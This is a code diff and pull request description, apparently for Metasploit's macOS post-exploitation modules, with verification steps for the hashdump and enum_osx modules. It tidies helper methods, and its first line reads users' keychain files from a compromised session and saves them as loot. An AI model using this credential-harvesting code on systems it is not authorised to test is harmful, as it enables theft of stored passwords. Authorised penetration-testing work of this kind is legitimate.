+      keychain_files.each { |k| add_loot("keychain_#{whoami}_#{File.basename(k, '.*')}.keychain", read_file(k.strip)) }
     end
   end
 
+  # Stores the requested data as loot.
+  def add_loot(filename, data)
+    mimetypes = Hash.new('text/plain').merge!({
+      '.jpg' => 'image/jpg',
+      '.keychain' => 'application/x-octet-stream'
+    })
+    p = store_loot(
+      File.basename(filename, '.*'), # filename without extension
+      mimetypes[File.extname(filename)],
+      session,
+      data,
+      filename
+    )
+    print_good("\tLoot saved to #{p}")
+  end
+
+  # @return [Bool] system version is at least 10.5
+  def leopard?
+    ver_num =~ /10\.(\d+)/ and $1.to_i >= 5
+  end
+
+  # @return [Bool] system version is at least 10.7
+  def lion?
+    ver_num =~ /10\.(\d+)/ and $1.to_i >= 7
+  end
+
+  # Checks if running as root on the target
+  # @return [Bool] current user is root
+  def root?
+    whoami == 'root'
+  end
+
+  # @return [Bool] system version is 10.4 or lower
+  def tiger?
+    ver_num =~ /10\.(\d+)/ and $1.to_i <= 4
+  end
+
+  # @param [String] user
+  # @return [String] absolute path to user's home directory
+  def home_dir(user)
+    if user == 'root'
+      '/var/root/'
+    else
+      "/Users/#{user}/"
+    end
+  end
+
+  # @return [Array<String>] list of user names
+  def users
+    @users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS
+  end
+
+  # @return [String] version string (e.g. 10.8.5)
+  def ver_num
+    @version ||= cmd_exec("/usr/bin/sw_vers -productVersion").chomp
+  end
+
+  # @return [String] name of current user
+  def whoami
+    @whoami ||= cmd_exec('/usr/bin/whoami', '').chomp
+  end
 end


### PR DESCRIPTION
Please do not review/merge, for now this is a placeholder PR so that I can verify. It will be closed momentarily.

This PR does a bit of touch-up work on some of the osx post modules:
- Removes required/default pattern for enum_adium, since it seemed restrictive
- Dries up a whole bunch of code in enum_osx.rb
- adds a bunch of datastore options to enum_osx to "opt-out" of certain enumerations
- Fixes a couple of places where `cat ...` was used instead of `Post::File#read_file`
- Kills some unnecessary comments/texts in different places
- Fixes some typos
- Updates all osx enum modules to use `store_loot`, rather than writing arbitrary xml files
#### Verification:

Go through these steps with a shell session on OSX 10.8 or 10.9:
- [ ] `post/osx/gather/enum_adium` works as expected
- [ ] `post/osx/gather/enum_airport` works as expected
- [ ] `post/osx/gather/hashdump` works as expected
- [ ] `post/osx/gather/enum_osx` works as expected

Now with a java meterpreter session on OSX 10.8 or 10.9:
- [ ] `post/osx/gather/hashdump` works as expected
- [ ] `post/osx/gather/enum_osx` works as expected

Now with a shell session OSX 10.7 or below:
- [ ] `post/osx/gather/hashdump` works as expected
- [ ] `post/osx/gather/enum_osx` works as expected
